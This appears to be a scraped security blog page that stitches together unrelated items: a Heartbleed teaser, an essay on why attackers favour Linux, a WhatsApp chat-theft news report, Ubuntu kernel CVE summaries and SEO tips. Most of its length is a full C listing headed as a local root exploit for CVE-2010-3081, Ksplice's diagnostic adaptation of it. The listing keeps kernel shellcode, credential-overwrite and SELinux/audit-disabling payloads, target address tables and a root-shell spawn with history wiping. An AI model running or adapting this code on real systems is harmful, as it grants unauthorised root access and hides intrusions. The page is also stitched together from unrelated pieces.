How to patch your server against The Heartbleed Bug

What is the Heartbleed Bug?

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library…

How to Copy Text from a Protected Web Page

Sometimes websites have a security feature in place that protects the text of the website to prevent users from stealing site content. But websites aren’t around forever and sometimes …

Why Hackers Prefer Linux

Linux use is growing at an amazing rate. This operating system, which has no public relations department, advertising, or government lobby, is being used widely in homes and server rooms alike. It’s also free, and 100% open source, meaning anyone can look at each and every line of code in the Linux kernel.
Linux is a true multiuser operating system, and has been since the very first version. It is powerful in its simplicity. Though there are robust graphical environments and tools, you can still do everything you could possibly need with just a keyboard and a shell prompt. Since you have the code, you could even make Linux do things it was never meant to.

That’s one of the things that draws both the gurus and the attackers alike.
The black-hats have thronged to Linux. It allows them the control they require to do strange and ingenious things. If they want to experiment with new or invalid network packets, they can do so easily without relying on undocumented (or non-existent) API support from the vendor.
Millions of lines of code have been written for Linux applications and libraries, usually in an extremely modular manner, which allows them to be integrated into widely diverse projects. For example, a library that allows you to sniff the network for proactive performance monitoring could be used as part of network hijacking code.

The power and flexibility of Linux make it the hacker’s playground. They use it, learn it, and understand it intimately. And that means that if there’s an insecurity, they’re going to find it.
However, the very reasons the hackers like Linux are the same reasons more folks are installing it on their own systems today. The ability to look at each and every line of Linux code, and patch it when problems arise, means that Linux can be secured not just by a few programmers locked away in some corporate headquarters, but by any user at any time.

kernel-2.6.18-164 2010 Local Root Exploit

Save this code as a C source file.
Code:

/*
kernel-2.6.18-164 2010 Local Root Exploit
=========================================
# Author: Hackeri-AL
# Email : h-al [at] hotmail [dot] it
# Group : UAH / United ALBANIA Hackers
# Web   : uah1.org.uk
# Greetz: LoocK3D - b4cKd00r ~
--------------------------------------------
Diagnostic test for CVE-2010-3081 public exploit
Greg Price, Ksplice, Inc.

Tests whether the system has previously been exposed to the exploit
published as "hackerial.c" by Hackeri-AL on 2010 Sep 15.  Based on the
original exploit code.

For more information, see
  http://www.ksplice.com/uptrack/cve-2010-3081

Source: http://inj3ct0r.com/exploits/14333
*/
#define _GNU_SOURCE
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/resource.h>
#include <errno.h>

#define __dgdhdytrg55           unsigned int
#define __yyrhdgdtfs66ytgetrfd  unsigned long long
#define __dhdyetgdfstreg__      memcpy

#define BANNER "Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.\n" \
               "(see http://www.ksplice.com/uptrack/cve-2010-3081)\n" \
               "\n"

#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"

#define Y0Y0SMAP              0x100000UL
#define Y0Y0CMAP              0x200000UL
#define Y0Y0STOP              (Y0Y0SMAP + 0xFFC)
#define J0J0S                 0x00200000UL
#define J0J0R00T              0x002000F0UL
#define PAGE_SIZE             0x1000

/* bits in the global 'flags' word */
#define KERN_DHHDYTMLADSFPYT               0x1
#define KERN_DGGDYDTEGGETFDRLAK            0x2
#define KERN_HHSYPPLORQTWGFD               0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT        0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS    0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM  0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX   0x40

#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver, ".el5"))

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while (0)
#define __pppp_tegddewyfg(s)         do { fprintf(stdout, "%s", s); } while (0)
/* #define __print_verbose(s) do { fprintf(stdout, "%s", s); } while(0) */
#define __print_verbose(s)           do { } while (0)
#define __xxxfdgftr_hshsgdt(s)       do { perror(s); exit(-1); } while (0)
#define __yyy_tegdtfsrer(s)          do { fprintf(stderr, s); exit(-1); } while (0)

static char buffer[1024];
static int s;
static int flags = 0;
static volatile socklen_t magiclen = 0;
static int useidt = 1, usefops = 0, uselsm = 0;
static __yyrhdgdtfs66ytgetrfd _m_fops = 0, _m_cred[3] = {0, 0, 0};
static __dgdhdytrg55 _m_cpu_off = 0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14
static char ttrg0ccc[] =
  "\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
  "\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
  "\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
  "\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
  "\xeb\xcc\x5e\x5b\x5f\x59\xc3";

#define R0YTTTTUHLFSTT_OFF1           5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D  21
#define R0TDGFSRSLLSJ_SHSYSTGD       45
char r1ngrrrrrrr[] =
  "\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
  "\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
  "\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
  "\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
  "\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF            13
#define RJMPDDTGR_DHDYTGSCAVSF    7
#define RJMPDDTGR_GDTDGTSFRDFT   25
static char ttrfd0[] =
  "\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
  "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
  "\x58\x5f"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xc3";

/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT            14
#define RJMPDDTGR_DYHHTSFDARE         8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE  27
static char ruujhdbgatrfe345[] =
  "\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
  "\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
  "\x0f\x01\xf8"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x48\xcf";

#define CJE_4554TFFDTRMAJHD_OFF         10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF  23
static char dis4blens4sel1nuxhayettgdr64545[] =
  "\x41\x52\x50"
  "\xb8\x00\x00\x00\x00"
  "\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x89\x02"
  "\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
  "\x41\x89\x02"
  "\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98
struct LSM_rhel
{
  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;
  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;
  const char *krelease;
  const char *kversion;
};

/* known RHEL 5 kernels, matched on uname release + version strings */
struct LSM_rhel known_targets[4] = {
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,
    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,
    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
    0xffffffff8031f600ULL,
    0xffffffff80320ec0ULL,
    0xffffffff804afc00ULL,
    0xffffffff804b2960ULL,
    0xffffffff8049e124ULL,
    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,
    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,
    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"  // default xen
  },
  {
    0xffffffff8031f600ULL,  // d selinux_ops
    0xffffffff80320ec0ULL,  // d capability_ops
    0xffffffff804afc00ULL,  // B dummy_security_ops
    0xffffffff804b2960ULL,  // B selinux_enforcing
    0xffffffff8049e124ULL,  // B audit_enabled
    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010"  // tripwire target LoL
  }
};

static struct LSM_rhel *curr_target = NULL, dyn4nt4n1labeggeyrthryt;

static int isSelinuxEnabled()
{
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH, "r");
  if (selinux_f == NULL)
  {
    if (errno == EPERM)
      return 1;
    else
      return 0;
  }
  fclose(selinux_f);
  return 1;
}

/* fills in uname release/version and returns the 2.6.N minor number
 * (e.g. 18 for "2.6.18-164.el5"), or -1 on failure */
static int wtfyourunhere_heee(char *out_release, char *out_version)
{
  int ret;
  const char *ptr;
  int count = 0;
  char r[32], *bptr;
  struct utsname buf;

  ret = uname(&buf);
  if (ret < 0)
    return -1;

  strcpy(out_release, buf.release);
  strcpy(out_version, buf.version);
  ptr = buf.release;
  bptr = r;
  memset(r, 0x00, sizeof(r));
  while (*ptr)
  {
    if (count == 2)
    {
      if (*ptr >= '0' && *ptr <= '9')
        *bptr++ = *ptr;
      else
        break;
    }
    if (*ptr == '.')
      count++;
    ptr++;
  }
  if (strlen(r) < 1 || !atoi(r))
    return -1;
  return atoi(r);
}

static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
  __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545) - 1);
  __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545) - 1);
}

/* look up symbol 's' in a kallsyms/System.map style file ("addr T name") */
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char *s, const char *filename, int ignore_flag)
{
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];

  if (!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;

  ka = fopen(filename, "r");
  if (!ka)
    return 0;
  while (fgets(line, 512, ka) != NULL)
  {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p  = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    while (*l_p != ' ' && (ra_p - reloc_a) < 64)
      *ra_p++ = *l_p++;
    l_p += 3;  /* skip " T " (space, symbol type, space) */
    while (*l_p != '\n' && *l_p != '\t' && *l_p != ' ' && (r_p - reloc) < 64)
      *r_p++ = *l_p++;
    if (!strcmp(reloc, s))
    {
      fclose(ka);
      return strtoull(reloc_a, NULL, 16);
    }
  }
  fclose(ka);
  return 0;
}

static inline __yyrhdgdtfs66ytgetrfd get_sym(const char *s)
{
  return get_sym_ex(s, KALLSYMS, 0);
}

/* parse "hex,hex,hex" given with -c into _m_cred[] */
static int parse_cred(const char *val)
{
  int i = 0;
  const char *p = val;
  char local[64], *l;
  for (i = 0; i < 3; i++)
  {
    memset(local, 0x00, sizeof(local));
    l = local;
    while (*p && *p != ',')
      *l++ = *p++;
    if (!(*p) && i != 2)
      return -1;
    _m_cred[i] = strtoull(local, NULL, 16);
    p++;
  }
  return 0;
}

#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
  int i;
  char mapbuf[128];
  struct LSM_rhel *lsm = &(known_targets[0]);

  if (check_rhel && !isRHHGDPPLADSF(krelease))
  {
    __pppp_tegddewyfg("!!! Not a RHEL kernel, will skip LSM method\n");
    return NULL;
  }
  __print_verbose("$$$ Looking for known RHEL kernels..\n");
  for (i = 0; i < (int)(sizeof(known_targets) / sizeof(struct LSM_rhel)); i++, lsm++)
  {
    if (!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
    {
      __gggdfstsgdt_dddex("$$$ Known target kernel: %s %s\n", lsm->krelease, lsm->kversion);
      return lsm;
    }
  }
  __print_verbose("$$$ Locating symbols for new target...\n");
  strcpy(mapbuf, "/boot/System.map-");
  strcat(mapbuf, krelease);
  dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
  dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
  dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
  dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
  dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

  if (!dyn4nt4n1labeggeyrthryt.selinux_ops ||
      !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops ||
      !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
    return NULL;

  return &dyn4nt4n1labeggeyrthryt;
}

void error_no_symbol(const char *symbol)
{
  fprintf(stderr,
          "!!! Could not find symbol: %s\n"
          "\n"
          "A symbol required by the published exploit for CVE-2010-3081 is not\n"
          "provided by your kernel.  The exploit would not work on your system.\n",
          symbol);
  exit(-1);
}

static void put_your_hands_up_hooker(int argc, char *argv[])
{
  int fd, ver, ret;
  char __b[16];

  fd = open(KALLSYMS, O_RDONLY);
  if (fd >= 0)
  {
    ret = read(fd, __b, 16);  // dummy read: are symbol addresses readable?
    if (ret > 0)
    {
      __print_verbose("$$$ can read /proc/kallsyms, will use for convenience\n");  // d0nt p4tch m3 br0
      flags |= KERN_HHSYPPLORQTWGFD;
    }
    close(fd);
  }
  ver = wtfyourunhere_heee(krelease, kversion);
  if (ver < 0)
    __yyy_tegdtfsrer("!!! uname failed\n");
  __gggdfstsgdt_dddex("$$$ Kernel release: %s\n", krelease);

  if (argc != 1)
  {
    while ((ret = getopt(argc, argv, "sflc:k:o:")) > 0)
    {
      switch (ret)
      {
        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM | KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;
        case 'l':
          flags |= KERN_DIS_GGDYYTDFFACVFD_IDT | KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          break;
        case 'c':
          if (!optarg || parse_cred(optarg) < 0)
            __yyy_tegdtfsrer("!!! Unable to parse cred codes\n");
          break;
        case 'k':
          if (optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
            __yyy_tegdtfsrer("!!! Unable to parse fops numbers\n");
          break;
        case 's':
          if (!isSelinuxEnabled())
            __pppp_tegddewyfg("??? -s ignored: SELinux not enabled\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
        case 'o':
          if (optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
          else
            __yyy_tegdtfsrer("!!! Unable to parse cpu_off numbers\n");
          break;
      }
    }
  }

  if (ver >= 29)  // needs cred structure
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;

    if (!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }
    if (!_m_cred[0])
      error_no_symbol("prepare_creds");
    if (!_m_cred[1])
      error_no_symbol("override_creds");
    if (!_m_cred[2])
      error_no_symbol("revert_creds");

    __print_verbose("$$$ Kernel credentials detected\n");
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1))          = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD))      = _m_cred[2];
  }
  if (ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if (!_m_cpu_off)
      _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
    if (!_m_cpu_off)
      error_no_symbol("per_cpu__current_task");
    __print_verbose("$$$ Kernel per_cpu relocs enabled\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF))         = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}

static void env_prepare(int argc, char *argv[])
{
  put_your_hands_up_hooker(argc, argv);
  if (!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  // try fops
  {
    __print_verbose("??? Trying the timer_list_fops method\n");
    if (!_m_fops)
      _m_fops = get_sym(RW_FOPS);
    /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
     * Thanks to the guy who killed this vector... you know who you are :)
     * Lucky for you, there are more :)
     */
    if (_m_fops)
    {
      usefops = 1;
    }
  }

  if (!(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM))  // try lsm (rhel)
  {
    __print_verbose("??? Trying the LSM method\n");
    curr_target = lsm_rhel_find_target(1);
    if (!curr_target)
    {
      __print_verbose("!!! Unable to find target for LSM method\n");
    }
    else {
      uselsm = 1;
    }
  }

  if (useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if (!curr_target)
    {
      __pppp_tegddewyfg("!!! Unable to find target: continue without SELinux disabled\n");
      /* remove Selinux Flag */
      flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }

  if (!usefops && !useidt && !uselsm)
    __yyy_tegdtfsrer("!!! All exploit methods failed.\n");
}

static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}

static void __setmcbuffer(__dgdhdytrg55 value)
{
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55 *)buffer;
  for (i = 0; i < (int)(sizeof(buffer) / sizeof(void *)); i++)
    *(p + i) = value;
}

static void y0y0stack()
{
  void *map = mmap((void *)Y0Y0SMAP,
                   PAGE_SIZE,
                   PROT_READ | PROT_WRITE,
                   MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED,
                   -1, 0);
  if (MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap");
}

static void y0y0code()
{
  void *map = mmap((void *)Y0Y0CMAP,
                   PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
                   PROT_READ | PROT_WRITE,
#else
                   PROT_READ | PROT_WRITE | PROT_EXEC,
#endif
                   MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED,
                   -1, 0);
  if (MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap");
}

static int rey0y0code(unsigned long old)
{
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];
  getcwd(cwd, sizeof(cwd));
  strcat(cwd, "/__tmpfile");

  unlink(cwd);
  fd = open(cwd, O_RDWR | O_CREAT, S_IRWXU);
  if (fd < 0)
    return -1;
  write(fd, (const void *)old, PAGE_SIZE);
  if (munmap((void *)old, PAGE_SIZE) < 0)
    return -1;
  map = mmap((void *)old,
             PAGE_SIZE,
             PROT_READ | PROT_EXEC,
             MAP_PRIVATE | MAP_FIXED,
             fd, 0);
  if (map == MAP_FAILED)
    return -1;

  /* avoid lazy page fault handler
   * Triple Fault when using idt vector
   * and no pages are already mapped :)
   */
  wizard = *((char *)old);
  unlink(cwd);
  return wizard;
}

void finish_shellcode()
{
  /* set shellcode level 2 */
  if (flags & KERN_DGGDYDTEGGETFDRLAK)
  {
    __print_verbose("$$$ Using cred shellcode\n");
    __dhdyetgdfstreg__((void *)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  }
  else
  {
    __print_verbose("$$$ Using standard shellcode\n");
    __dhdyetgdfstreg__((void *)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int *)(J0J0R00T + R0C_0FF)) = getuid();
  }
#ifdef TRY_REMAP_DEFAULT
  if (rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("!!! Unable to remap\n");
#endif
}

int method_idt_main()
{
  __yyrhdgdtfs66ytgetrfd *patch;
  __print_verbose("$$$ Building shellcode - IDT method\n");
  patch = (__yyrhdgdtfs66ytgetrfd *)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
  *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
  if (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
  {
    __print_verbose("$$$ including code to disable SELinux\n");
    p4tch_sel1nux_codztegfaddczda(curr_target);
  }

  __dhdyetgdfstreg__((void *)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  finish_shellcode();
  asm volatile("int $0xdd\n");
  return (getuid() == 0);
}

int method_idt()
{
  /* method_idt_main() crashes if no backdoor is present, so protect ourselves */
  int pid;
  pid = fork();
  if (pid < 0) {
    __xxxfdgftr_hshsgdt("!!! fork() failed");
    return 0;  // error
  }
  if (pid == 0) {
    int r;
    struct rlimit rlim = {0, 0};
    setrlimit(RLIMIT_CORE, &rlim);  // no core dump from the probe child
    r = method_idt_main();
    exit(r ? 0 : 1);
  }
  int status;
  waitpid(pid, &status, 0);
  if (status == 0)
    return method_idt_main();
  else
    return 0;
}

void prepare_fops_lsm_shellcode()
{
  __yyrhdgdtfs66ytgetrfd *patch;
  __print_verbose("$$$ Building shellcode - fops/LSM method\n");
  patch = (__yyrhdgdtfs66ytgetrfd *)(ttrfd0 + RJMPDDTGR_OFF);
  *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
  __setmcbuffer(J0J0S);
  if (uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
    __print_verbose("$$$ including code to disable SELinux\n");
    p4tch_sel1nux_codztegfaddczda(curr_target);
  }
  __dhdyetgdfstreg__((void *)J0J0S, ttrfd0, sizeof(ttrfd0));
  finish_shellcode();
}

int method_fops()
{
  int fd;
  struct pollfd pfd;
  prepare_fops_lsm_shellcode();
  fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
  if (fd < 0)
    __xxxfdgftr_hshsgdt("!!! could not open /proc/timer_list");

  pfd.fd = fd;
  pfd.events = POLLIN | POLLOUT;
  poll(&pfd, 1, 0);
  return (getuid() == 0);
}

int method_lsm()
{
  int msqid;
  prepare_fops_lsm_shellcode();
  msqid = msgget(0, IPC_PRIVATE | 0600);
  if (msqid < 0)
    __xxxfdgftr_hshsgdt("!!! msgget() failed");
  msgctl(msqid, IPC_RMID, (struct msqid_ds *)NULL);  // exploit it
  return (getuid() == 0);
}

int main(int argc, char *argv[])
{
  int done;
  printf(BANNER);
  if (getuid() == 0) {
    fprintf(stderr, "!!! Must run as non-root.\n");
    return 1;
  }
  env_prepare(argc, argv);
  y0y0stack();
  y0y0code();
  done = 0;

  /* try each of the three vectors the published exploit leaves behind */
  __pppp_tegddewyfg("$$$ Backdoor in LSM (1/3): ");
  if (uselsm) {
    __pppp_tegddewyfg("checking... ");
    done = method_lsm();
    if (done)
      __pppp_tegddewyfg("PRESENT\n");
    else
      __pppp_tegddewyfg("not present.\n");
  } else {
    __pppp_tegddewyfg("not available.\n");
  }
  if (!done) {
    __pppp_tegddewyfg("$$$ Backdoor in timer_list_fops (2/3): ");
    if (usefops) {
      __pppp_tegddewyfg("checking... ");
      done = method_fops();
      if (done)
        __pppp_tegddewyfg("PRESENT\n");
      else
        __pppp_tegddewyfg("not present.\n");
    } else {
      __pppp_tegddewyfg("not available.\n");
    }
  }
  if (!done) {
    __pppp_tegddewyfg("$$$ Backdoor in IDT (3/3): ");
    if (useidt) {
      __pppp_tegddewyfg("checking... ");
      fflush(stdout);
      done = method_idt();
      if (done)
        __pppp_tegddewyfg("PRESENT\n");
      else
        __pppp_tegddewyfg("not present.\n");
    } else {
      __pppp_tegddewyfg("NOT CHECKING\n");
    }
  }
  munmap((void *)Y0Y0CMAP, PAGE_SIZE);
  /* exec */
  if (getuid() == 0)
  {
    pid_t pid;
    printf("\n"
           "Your in-memory kernel HAS A BACKDOOR that may have been left\n"
           "by the published exploit for CVE-2010-3081.\n"
           "\n"
           "More information is available at\n"
           "  http://www.ksplice.com/uptrack/cve-2010-3081\n"
           );
    if (0) {
      /* spawn root shell as demonstration (disabled) */
      pid = fork();
      if (pid == 0)
      {
        char *args[] = {"/bin/sh", "-i", NULL};
        char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
                        "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL};
        execve("/bin/sh", args, envp);
      }
      else
      {
        int status;
        waitpid(pid, &status, 0);
      }
    }
  }
  else {
    printf("\n"
           "Your system is free from the backdoors that would be left in memory\n"
           "by the published exploit for CVE-2010-3081.\n");
  }
  close(s);
  return 0;
}

New Vulnerability found in WhatsApp, read private chats

A security consultant has uncovered a security hole in WhatsApp, the instant messaging platform recently acquired by Facebook. The flaw can be leveraged to gain access to the private chats of Android device owners.
Many people are concerned with the privacy implications that come with Facebook’s acquisition of WhatsApp. However, as Bas Bosschert, the man who identified the vulnerability, highlights, Facebook didn’t need to buy the company if all it wanted to do was read users’ chats.
The expert has found that any Android app that’s allowed access to the SD card installed on the device can easily access private conversations. 
All chats are saved in a database file (msgstore.db) that’s stored on the SD card. Bosschert has developed a proof-of-concept which demonstrates that any app that’s granted permission to access the card can easily retrieve the database and upload it to a remote server.
According to Bosschert, in newer versions of WhatsApp, the database file is encrypted. However, this doesn’t mean that users’ private chats are secure. It simply means that an attacker would have to decrypt the database file to gain access to its contents.
The decryption key can be found in WhatsApp Xtract, an app that allows users to create backups of WhatsApp conversations.
The POC developed by the expert is designed so that when the database is retrieved, the victim only sees a simple loading screen. Cybercriminals could combine the data-stealing code with a popular application to harvest a large number of databases. 
In February, security researchers from Praetorian revealed finding a number of SSL-related vulnerabilities in WhatsApp. Most of them were fixed almost immediately by the company. 
Source: Softpedia

Ubuntu 13.10 Kernel Exploit

A security issue affects Ubuntu 13.10 and its derivatives.

Saran Neti reported a flaw in the ipv6 UDP Fragmentation Offload (UFO) in the Linux kernel. A remote attacker could exploit this flaw to cause a denial of service (panic). (CVE-2013-4563)

Mathy Vanhoef discovered an error in the way the ath9k driver was handling the BSSID masking. A remote attacker could exploit this error to discover the original MAC address after a spoofing attack. (CVE-2013-4579)

Andrew Honig reported a flaw in the Linux kernel’s kvm_vm_ioctl_create_vcpu function of the Kernel Virtual Machine (KVM) subsystem. A local user could exploit this flaw to gain privileges on the host machine. (CVE-2013-4587) Various other issues were also addressed.

Andrew Honig reported a flaw in the apic_get_tmcct function of the Kernel Virtual Machine (KVM) subsystem of the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service or host OS system crash. (CVE-2013-6367)

Andrew Honig reported an error in the Linux kernel’s Kernel Virtual Machine (KVM) VAPIC synchronization operation. A local user could exploit this flaw to gain privileges or cause a denial of service (system crash).

Source: Ubuntu

How to Analyze Your Website for Search Engine Optimization

  • A Web page with a “0” Google™ PageRank™ needs attention: PageRank™ denotes a Website’s importance in the eyes of Google™.
  • Fact: If you are not on the first page of search results, over 60% of Internet users will not find you!
  • A Title Tag that contains too many characters is not what we consider a “robot friendly” Web page. The maximum number of characters we recommend for this Tag is 60.
